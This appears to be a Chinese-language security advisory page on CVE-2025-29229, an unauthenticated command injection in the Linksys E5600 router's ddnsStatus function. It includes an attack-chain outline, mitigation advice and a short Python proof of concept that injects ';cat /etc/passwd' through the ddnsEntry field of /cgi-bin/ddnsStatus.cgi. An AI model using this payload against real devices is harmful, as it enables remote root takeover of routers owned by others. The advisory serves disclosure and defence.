CVE-2025-29229 CVSS 9.8 严重

CVE-2025-29229 Linksys E5600 ddnsStatus函数命令注入漏洞

披露日期: 2025-12-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-29229

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linksys E5600 V1.1.0.26

漏洞概述

CVE-2025-29229是Linksys E5600路由器V1.1.0.26版本中的一个严重命令注入漏洞。该漏洞存在于ddnsStatus函数中，攻击者可以通过构造恶意请求在受影响的设备上执行任意系统命令。由于CVSS评分高达9.8且属于网络可达的无认证漏洞，攻击者可以在无需任何用户交互和认证的情况下远程利用此漏洞，完全控制目标路由器设备。此漏洞影响路由器的机密性、完整性和可用性，攻击成功后可获取设备完全控制权、窃取网络流量、植入后门或进行进一步的内网攻击。

技术细节

该命令注入漏洞位于Linksys E5600路由器的ddnsStatus函数中。攻击者通过向该函数发送特制的请求，可以在未经过滤的情况下将用户输入拼接到系统命令中执行。漏洞原因在于应用程序未对用户提供的参数进行适当的输入验证和命令转义。攻击者利用此漏洞可以注入分号、反引号或管道等shell特殊字符来分割命令并执行额外系统指令。由于该接口通常无需认证即可访问，攻击者可以直接通过HTTP/HTTPS请求触发漏洞，实现远程代码执行。成功利用后，攻击者可以以root权限在路由器上执行任意命令。

攻击链分析

STEP 1

步骤1

攻击者发现目标Linksys E5600路由器并识别其版本为V1.1.0.26

STEP 2

步骤2

攻击者构造包含恶意shell命令的HTTP请求，目标是ddnsStatus函数

STEP 3

步骤3

通过注入分号、反引号或管道等特殊字符绕过输入验证

STEP 4

步骤4

发送恶意请求到/cgi-bin/ddnsStatus.cgi端点

STEP 5

步骤5

漏洞被触发，恶意命令以root权限在路由器上执行

STEP 6

步骤6

攻击者获取设备完全控制权，可窃取数据、安装后门或发起内网攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target-ip/cgi-bin/ddnsStatus.cgi'
payload = ';cat /etc/passwd > /tmp/out.txt'

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
}

data = {
    'ddnsEntry': payload,
    'submit': 'Apply'
}

response = requests.post(target, headers=headers, data=data, timeout=10)
print(f'Status: {response.status_code}')
print(f'Response: {response.text}')

影响范围

Linksys E5600 V1.1.0.26

防御指南

临时缓解措施

在厂商发布修复补丁前，建议通过访问控制列表(ACL)限制对路由器管理接口的访问，仅允许受信任的IP地址访问管理页面。考虑禁用路由器的远程管理功能，仅通过本地网络进行管理操作。同时监控设备日志，关注异常的CGI请求模式。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表